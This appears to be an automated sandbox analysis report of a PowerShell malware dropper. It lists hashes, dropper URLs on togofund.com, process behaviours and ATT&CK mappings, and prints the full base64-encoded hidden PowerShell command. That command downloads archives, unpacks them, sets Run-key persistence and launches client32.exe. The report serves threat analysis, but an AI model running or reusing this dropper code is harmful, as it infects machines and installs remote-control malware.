fe3abbdd4e00d96d32a444fa1201213100e1e26713db0fe8e6fd8dc1f1f7516f

General

Target

saint_1869.ps1
Size

7KB
MD5

0e49333de50a8a3db16f714990052c83
SHA1

2866de43c124f3942434c41f73d4de3015463180
SHA256

fe3abbdd4e00d96d32a444fa1201213100e1e26713db0fe8e6fd8dc1f1f7516f
SHA512

e7c744848ca0d48e7e0f1b76db9f781907584c586d5b1f0bd9349f592b29b52330b41c38391f747e0ddb79ecf5f3396d2d8ab7e3ec7df24d69fe06cdab08ec1f
SSDEEP

192:AELjerKiK6siYJESaZHi5qjMLV0XwidnvwkHbFOfMd:AwgLKBiYJEZ+z+vxH0fMd

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://togofund.com/arks/3corn.zip

exe.dropper

https://togofund.com/arks/corn1.zip

exe.dropper

https://togofund.com/arks/corn2.zip

exe.dropper

https://togofund.com/arks/4corn.zip

exe.dropper

https://togofund.com/fide/

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2328	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2328	powershell.exe
1864	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	1864	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 1864	2328	powershell.exe	31
PID 2328 wrote to memory of 1864	2328	powershell.exe	31
PID 2328 wrote to memory of 1864	2328	powershell.exe	31

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\saint_1869.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOPR -eXEcutiOnpo BYPASS -WI HId -Enc JABhAGYAUQBaAEoAUgAzAGYAPQAnAEkAYwBVADAAbABzAC4AegBpAHAAJwA7ACAAJABXAEkAbgBHAGMAcwA9ACcATAB0AFQANgBiAGwAUQAuAHoAaQBwACcAOwAgACQATgAxAHgAOABCADMAZgA9ACcAaAB0AHQAcABzADoALwAvAHQAbwBnAG8AZgB1AG4AZAAuAGMAbwBtAC8AYQByAGsAcwAvADMAYwBvAHIAbgAuAHoAaQBwACcAOwAgACQAWgBrAG0AbQBKADYAagBWAD0AJwBNAHMAVABlAGEAbQBzAFMAeQBuAGMAJwA7ACAAJABQAFYAYQBUAFYAZwA3ADcAPQAnAHcAVQBaAG4AbgAuAHoAaQBwACcAOwAgACQAaQA5ADUAagA4AGMAUAA9ACcAaAB0AHQAcABzADoALwAvAHQAbwBnAG8AZgB1AG4AZAAuAGMAbwBtAC8AYQByAGsAcwAvAGMAbwByAG4AMQAuAHoAaQBwACcAOwAgACQANAB2AGgAVwBCAD0AJwBoAHQAdABwAHMAOgAvAC8AdABvAGcAbwBmAHUAbgBkAC4AYwBvAG0ALwBhAHIAawBzAC8AYwBvAHIAbgAyAC4AegBpAHAAJwA7ACAAWwBuAGUAVAAuAFMARQByAFYASQBjAGUAUABPAEkAbgB0AE0AYQBOAGEAZwBlAFIAXQA6ADoAUwBFAEMAdQBSAGkAdAB5AHAAUgBPAFQAbwBjAE8ATAAgAD0AIABbAG4AZQBUAC4AUwBlAGMAVQBSAEkAdAB5AFAAcgBvAHQATwBjAG8ATAB0AFkAUABlAF0AOgA6AHQAbABzADEAMgA7ACAAJABRAHIAdABEAHMAVQA9ACcAaAB0AHQAcABzADoALwAvAHQAbwBnAG8AZgB1AG4AZAAuAGMAbwBtAC8AYQByAGsAcwAvADQAYwBvAHIAbgAuAHoAaQBwACcAOwAgACQANABGAFgANQBBAHIAYQA9ACcAUwBYAEEAagA0ADAAMABKAC4AegBpAHAAJwA7ACAAJABtAEsAZgB3AE0AWAByAG4APQBnAGMATQAgAEUAeABQAGEATgBEAC0AYQByAGMAaABJAFYAZQAgAC0ARQByAFIAbwBSAEEAQwB0AGkAbwBuACAAUwBJAEwARQBOAHQAbAB5AGMAbwBOAHQASQBuAFUAZQA7ACAAQwBIAEQAaQByACAAJABFAG4AVgA6AEEAUABQAGQAYQB0AGEAOwAgACQAQgBmAHUAVABNAD0AZwBjAE0AIABTAHQAYQBSAFQALQBCAGkAVABzAHQAcgBhAE4AUwBmAGUAUgAgAC0ARQBSAHIAbwByAGEAQwBUAEkAbwBuACAAUwBpAGwARQBOAFQAbABZAGMAbwBuAFQASQBOAHUARQA7ACAAJABJAEoAaQBFAEoAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBuAHYAOgBBAFAAUABkAGEAVABBACwAIAAkAFAAVgBhAFQAVgBnADcANwA7ACAAJABvAHYAVwBIAEIAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBuAFYAOgBhAHAAUABEAEEAdABBACwAIAAkAGEAZgBRAFoASgBSADMAZgA7ACAAJABEAFcAQQByAEkARQBtADQAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBuAFYAOgBhAHAAUABEAEEAdABBACwAIAAkAFcASQBuAEcAYwBzADsAIAAkAFMAaABuAEgAMAA2AEwAMAA9AGoAbwBJAG4ALQBwAGEAdABoACAALQBQAGEAdABIACAAJABFAG4AdgA6AEEAUABQAGQAQQBUAEEAIAAtAEMAaABpAGwAZABwAEEAdABoACAAJAA0AEYAWAA1AEEAcgBhADsAIAAkAGsAcgBwADEAYgBZAGwANAA9AEoAbwBJAE4ALQBQAGEAdABIACAALQBwAEEAdABoACAAJABFAE4AdgA6AEEAcABwAGQAYQBUAGEAIAAtAEMAaABpAGwAZABQAEEAdABIACAAJABaAGsAbQBtAEoANgBqAFYAOwAgACQAcQBmAFgAMQBFAEQAPQAiAGIASQB0AHMAYQBEAE0AaQBuAC4ARQBYAGUAIAAvAFQAUgBhAG4AcwBGAGUAcgAgAE8ANABHAE8AbABmAHoAUQAgAC8ARABPAFcAbgBMAG8AYQBEACAALwBwAHIASQBvAFIAaQB0AFkAIABOAE8AUgBNAEEATAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQANAB2AGgAVwBCACwAIAAkAFMAaABuAEgAMAA2AEwAMAA7ACAAJABGAFUARQAwAHMAbwBHADkAPQAiAGIAaQB0AHMAYQBkAG0AaQBuAC4ARQB4AEUAIAAvAFQAcgBBAG4AcwBGAGUAUgAgAEwAZABLAGoAZQBlAEYAIAAvAGQATwBXAG4AbABPAGEAZAAgAC8AUABSAEkATwByAEkAdABZACAATgBPAHIATQBBAEwAIAB7ADAAfQAgAHsAMQB9ACIAIAAtAGYAIAAkAGkAOQA1AGoAOABjAFAALAAgACQARABXAEEAcgBJAEUAbQA0ADsAIAAkADkAYwBDAG0AcgA9ACIAQgBpAFQAUwBhAEQATQBJAE4ALgBFAHgAZQAgAC8AVABSAGEAbgBTAEYARQBSACAARgB3AFoANwAwAFIAYQBIACAALwBkAG8AVwBuAGwATwBhAEQAIAAvAHAAcgBJAG8AUgBpAHQAWQAgAE4ATwByAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJABOADEAeAA4AEIAMwBmACwAIAAkAEkASgBpAEUASgA7ACAAJABRAGMAVQBiAGEAPQAnAGIAaQB0AHMAYQBkAG0AaQBuAC4ARQB4AEUAIAAvAFQAcgBBAG4AcwBGAGUAUgAgAEwAZABLAGoAZQBlAEYAIAAvAGQATwBXAG4AbABPAGEAZAAgAC8AUABSAEkATwByAEkAdABZACAATgBPAHIATQBBAEwAJwAsACAAJABRAHIAdABEAHMAVQAsACAAJABvAHYAVwBIAEIAIAAtAEoAbwBpAE4AIAAnACAAJwA7ACAASQBGACAAKAAkAG0ASwBmAHcATQBYAHIAbgApACAAewAgAEkAZgAgACgAJABCAGYAdQBUAE0AKQAgAHsAIABzAHQAYQByAFQALQBiAGkAVABTAHQAcgBhAE4AcwBGAEUAUgAgAC0AUwBPAFUAcgBjAEUAIAAkAE4AMQB4ADgAQgAzAGYAIAAtAGQARQBTAFQASQBOAEEAdABpAE8AbgAgACQASQBKAGkARQBKADsAIABTAHQAQQBSAFQALQBCAGkAVABzAHQAUgBhAG4AcwBGAEUAcgAgAC0AUwBPAFUAcgBjAEUAIAAkAFEAcgB0AEQAcwBVACAALQBkAEUAcwB0AGkATgBBAHQASQBvAG4AIAAkAG8AdgBXAEgAQgA7ACAAcwB0AEEAUgB0AC0AQgBJAFQAcwB0AFIAQQBOAHMARgBFAHIAIAAtAFMATwBVAFIAQwBFACAAJABpADkANQBqADgAYwBQACAALQBkAEUAcwBUAEkAbgBhAHQAaQBvAE4AIAAkAEQAVwBBAHIASQBFAG0ANAA7ACAAUwB0AGEAcgBUAC0AQgBpAHQAUwBUAFIAQQBuAHMARgBFAFIAIAAtAFMATwB1AHIAQwBFACAAJAA0AHYAaABXAEIAIAAtAGQARQBTAFQAaQBuAEEAVABpAG8ATgAgACQAUwBoAG4ASAAwADYATAAwADsAIAB9ACAARQBsAFMARQAgAHsASQBuAHYATwBrAEUALQBlAFgAcAByAEUAUwBzAGkAbwBOACAALQBDAE8AbQBNAGEATgBkACAAJABxAGYAWAAxAEUARAA7ACAAaQBlAHgAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAEYAVQBFADAAcwBvAEcAOQA7ACAAaQBlAHgAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAFEAYwBVAGIAYQA7ACAAJgAgACQAOQBjAEMAbQByADsAIAB9ACAARQBYAHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBQAEEAdABIACAAJABvAHYAVwBIAEIAIAAtAEQARQBTAHQAaQBOAEEAdABJAE8ATgBwAGEAdABoACAAJABrAHIAcAAxAGIAWQBsADQAOwAgAEUAeABQAEEATgBkAC0AQQBSAEMAaABpAHYARQAgAC0AcABhAFQASAAgACQARABXAEEAcgBJAEUAbQA0ACAALQBkAEUAUwBUAEkATgBhAHQASQBvAG4AUABBAHQASAAgACQAawByAHAAMQBiAFkAbAA0ADsAIABFAHgAUABhAE4AZAAtAGEAcgBDAEgASQB2AGUAIAAtAFAAQQBUAGgAIAAkAFMAaABuAEgAMAA2AEwAMAAgAC0ARABFAHMAdABJAG4AQQB0AEkAbwBuAFAAQQBUAEgAIAAkAGsAcgBwADEAYgBZAGwANAA7ACAAZQBYAHAAQQBOAGQALQBBAFIAQwBIAGkAdgBFACAALQBwAGEAVABIACAAJABJAEoAaQBFAEoAIAAtAEQAZQBTAHQAaQBOAGEAVABpAG8AbgBwAEEAVABoACAAJABrAHIAcAAxAGIAWQBsADQAOwAgAFIASQAgAC0AUABBAHQASAAgACQAbwB2AFcASABCADsAIAByAE0AIAAtAHAAYQBUAEgAIAAkAFMAaABuAEgAMAA2AEwAMAA7ACAARQByAGEAUwBlACAALQBQAEEAVABoACAAJABJAEoAaQBFAEoAOwAgAHIATQAgAC0AcABhAHQAaAAgACQARABXAEEAcgBJAEUAbQA0ADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkADMATQBUAG4AdwBTAGoAPQBAACgAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBpAG4AaQAnACwAIAAnAG4AcwBrAGIAZgBsAHQAcgAuAGkAbgBmACcALAAgACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAFAAQwBJAEMASABFAEsALgBEAEwATAAnACwAIAAnAHAAYwBpAGMAYQBwAGkALgBkAGwAbAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAE4AUwBNAC4ATABJAEMAJwAsACAAJwByAGUAbQBjAG0AZABzAHQAdQBiAC4AZQB4AGUAJwApADsAIABuAGkAIAAtAHAAQQBUAGgAIAAkAGUATgBWADoAQQBQAHAARABhAFQAQQAgAC0ATgBhAE0ARQAgACQAWgBrAG0AbQBKADYAagBWACAALQBJAHQARQBtAHQAeQBwAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQAawAxAHUASgBvAD0AJwBoAHQAdABwAHMAOgAvAC8AdABvAGcAbwBmAHUAbgBkAC4AYwBvAG0ALwBmAGkAZABlAC8AJwA7ACAASQBmACAAKAAkAEIAZgB1AFQATQApACAAewAgACQAMwBNAFQAbgB3AFMAagAgAHwAIABGAG8AUgBlAGEAQwBoACAAewAgACQAdABFAEcASwBBAD0AJABrADEAdQBKAG8AKwAkAF8AOwAgACQAaABvAEsASABGAD0AagBPAGkATgAtAFAAQQB0AGgAIAAtAFAAQQB0AGgAIAAkAGsAcgBwADEAYgBZAGwANAAgAC0AYwBIAEkAbABEAFAAYQB0AEgAIAAkAF8AOwAgAHMAdABhAHIAdAAtAEIASQBUAFMAVAByAEEATgBzAEYAZQByACAALQBzAE8AVQByAGMARQAgACQAdABFAEcASwBBACAALQBkAEUAcwBUAEkATgBhAHQASQBPAG4AIAAkAGgAbwBLAEgARgA7ACAAfQA7AH0AIABlAGwAcwBlACAAewAgACQAMwBNAFQAbgB3AFMAagAgAHwAIABmAG8AUgBFAGEAQwBIACAAewAgACQAdABFAEcASwBBAD0AJABrADEAdQBKAG8AKwAkAF8AOwAgACQAaABvAEsASABGAD0AagBPAGkATgAtAFAAQQB0AGgAIAAtAFAAQQB0AGgAIAAkAGsAcgBwADEAYgBZAGwANAAgAC0AYwBIAEkAbABEAFAAYQB0AEgAIAAkAF8AOwAgACQATQA4AFcAUABMAD0AIgBiAGkAdABTAGEARABtAGkATgAuAEUAeABlACAALwBUAFIAQQBuAFMARgBFAFIAIABvAEcAVgB3ADgAdABtAEwAIAAvAEQATwB3AE4ATABPAEEAZAAgAC8AUAByAEkATwBSAGkAdAB5ACAAbgBvAHIATQBhAGwAIAAkAHQARQBHAEsAQQAgACQAaABvAEsASABGACIAOwAgAGkARQBYACAALQBjAE8AbQBtAEEATgBEACAAJABNADgAVwBQAEwAOwB9ADsAIAB9ADsAIAB9ADsAIAAkAFYAOABUAHgAcAA9AEcARQBUAC0AaQBUAGUAbQAgACQAawByAHAAMQBiAFkAbAA0ACAALQBGAE8AUgBDAGUAOwAgACQAVgA4AFQAeABwAC4AYQB0AFQAUgBJAEIAdQBUAEUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAQwBIAEQAaQByACAAJABrAHIAcAAxAGIAWQBsADQAOwAgACQARgBoAEYAbwBRAD0AJABrAHIAcAAxAGIAWQBsADQAKwAnAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwA7ACAAbgBlAFcALQBJAFQAZQBtAHAAUgBPAFAARQByAHQAWQAgAC0AUABhAHQAaAAgACcASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAE0ARQAgACQAWgBrAG0AbQBKADYAagBWACAALQB2AGEATAB1AGUAIAAkAEYAaABGAG8AUQAgAC0AUABSAG8AcABFAFIAdABZAFQAeQBwAEUAIAAnAFMAdAByAGkAbgBnACcAOwAgAHMAVABBAHIAdAAtAHAAcgBvAEMAZQBTAFMAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
16a16b2a760c0409feb7e0e75e5f1f00

SHA1
41460c0a0708b072a55c609530077bd0b7906c97

SHA256
050aef21d62c888fa08069f24481695b9cdad7e8491d90af2502cc12b8856f20

SHA512
5ceb62b4ba0393a33faae6c1491a0dba8a1f51fd93de33b9d2b94a32ae1d67e76f91ada17de4df53b5e121948ccb6eff8254d7a4e0a64368150912e891bf8199

Download Submit
memory/1864-15-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/1864-16-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2328-4-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp

Filesize
4KB

Download
memory/2328-5-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2328-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2328-7-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2328-8-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2328-9-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2328-17-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads